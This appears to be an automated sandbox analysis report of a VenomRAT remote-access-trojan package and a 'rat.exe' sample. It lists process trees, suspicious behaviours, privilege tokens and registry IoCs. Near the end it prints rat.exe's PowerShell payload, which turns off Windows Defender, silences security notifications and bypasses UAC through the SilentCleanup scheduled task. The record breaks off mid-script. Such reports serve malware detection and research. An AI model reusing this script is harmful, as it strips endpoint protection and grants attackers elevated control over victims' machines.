pid Process 1272 msedge.exe 1272 msedge.exe 1468 msedge.exe 1468 msedge.exe 1164 identity_helper.exe 1164 identity_helper.exe 1880 msedge.exe 1880 msedge.exe 3380 msedge.exe 3380 msedge.exe 2196 tsetup-x64.5.9.0.tmp 2196 tsetup-x64.5.9.0.tmp 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe 2752 rat.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 4744 Telegram.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 2752 rat.exe 2804 Client.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3928 7zG.exe Token: 35 3928 7zG.exe Token: SeSecurityPrivilege 3928 7zG.exe Token: SeSecurityPrivilege 3928 7zG.exe Token: SeDebugPrivilege 5072 Venom RAT + HVNC + Stealer + Grabber.exe Token: SeDebugPrivilege 2752 rat.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 3256 whoami.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 4200 whoami.exe Token: SeDebugPrivilege 1732 rat.exe Token: SeDebugPrivilege 2804 Client.exe Token: SeIncreaseQuotaPrivilege 4632 WMIC.exe Token: SeSecurityPrivilege 4632 WMIC.exe Token: SeTakeOwnershipPrivilege 4632 WMIC.exe Token: SeLoadDriverPrivilege 4632 WMIC.exe Token: SeSystemProfilePrivilege 4632 WMIC.exe Token: SeSystemtimePrivilege 4632 WMIC.exe Token: SeProfSingleProcessPrivilege 4632 WMIC.exe Token: SeIncBasePriorityPrivilege 4632 WMIC.exe Token: SeCreatePagefilePrivilege 4632 WMIC.exe Token: SeBackupPrivilege 4632 WMIC.exe Token: SeRestorePrivilege 4632 WMIC.exe Token: SeShutdownPrivilege 4632 WMIC.exe Token: SeDebugPrivilege 4632 WMIC.exe Token: SeSystemEnvironmentPrivilege 4632 WMIC.exe Token: SeRemoteShutdownPrivilege 4632 WMIC.exe Token: SeUndockPrivilege 4632 WMIC.exe Token: SeManageVolumePrivilege 4632 WMIC.exe Token: 33 4632 WMIC.exe Token: 34 4632 WMIC.exe Token: 35 4632 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 4744 Telegram.exe 4744 Telegram.exe 4744 Telegram.exe 4744 Telegram.exe 4744 Telegram.exe 4744 Telegram.exe 4744 Telegram.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 4744 Telegram.exe 4744 Telegram.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4744 Telegram.exe 4744 Telegram.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 2752 rat.exe 3920 OpenWith.exe 1732 rat.exe 5072 Venom RAT + HVNC + Stealer + Grabber.exe 2804 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1468 wrote to memory of 1776 1468 msedge.exe 77 PID 1468 wrote to memory of 1776 1468 msedge.exe 77 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 3484 1468 msedge.exe 78 PID 1468 wrote to memory of 1272 1468 msedge.exe 79 PID 1468 wrote to memory of 1272 1468 msedge.exe 79 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 PID 1468 wrote to memory of 3424 1468 msedge.exe 80 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Client.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Client.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2420 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:1588
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:1600
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:2996
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:3528
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://t.me/RELabDiscussion/308861⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff882223cb8,0x7ff882223cc8,0x7ff882223cd82⤵PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:22⤵PID:3484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:82⤵PID:3424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:12⤵PID:2908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:12⤵PID:2300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:12⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:12⤵PID:2872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:12⤵PID:4136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:12⤵PID:1012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:12⤵PID:4012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:12⤵PID:1860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:12⤵PID:3136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5996 /prefetch:82⤵PID:1420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,17788630381493818846,14699712852400648506,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3380
-
-
C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe"C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\is-8MOCR.tmp\tsetup-x64.5.9.0.tmp"C:\Users\Admin\AppData\Local\Temp\is-8MOCR.tmp\tsetup-x64.5.9.0.tmp" /SL5="$D007C,45613588,827904,C:\Users\Admin\Downloads\tsetup-x64.5.9.0.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2196 -
C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4744
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5044
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3096
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4812
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\" -ad -an -ai#7zMap13745:110:7zEvent139791⤵
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Venom RAT + HVNC + Stealer + Grabber.exe"C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Venom RAT + HVNC + Stealer + Grabber.exe"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5072 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\ClientsFolder\127.0.0.1\Information\Information.txt2⤵PID:3056
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2920
-
C:\Users\Admin\Downloads\rat.exe"C:\Users\Admin\Downloads\rat.exe"1⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
